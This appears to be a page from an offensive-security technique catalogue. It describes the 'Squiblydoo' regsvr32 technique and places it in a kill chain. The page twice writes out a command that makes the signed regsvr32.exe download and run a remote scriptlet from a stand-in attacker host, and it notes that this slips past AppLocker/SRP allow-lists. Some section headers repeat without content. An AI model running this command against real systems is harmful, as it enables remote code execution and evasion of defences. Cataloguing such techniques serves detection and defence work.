LOL-REGSVR32Execution

regsvr32.exe /i Scriptlet (Squiblydoo)

regsvr32 /s /n /u /i:http://attacker/file.sct scrobj.dll — remote SCT execution via signed registrar.

§ Where this technique fits

LOL-REGSVR32 is catalogued under the Execution tactic of the offensive-security kill-chain. It appears in 1 approved dossier in the registry, typically at step 3 on average.

§ Dossiers chaining this technique

Squiblydoo: regsvr32 → remote SCT execution
regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
step 3 / 5

§ What commonly comes next

01
Command and Scripting Interpreter
T1059 · Execution
seen 1×

§ Where this technique fits

§ Dossiers chaining this technique

Squiblydoo: regsvr32 → remote SCT execution

§ What commonly comes next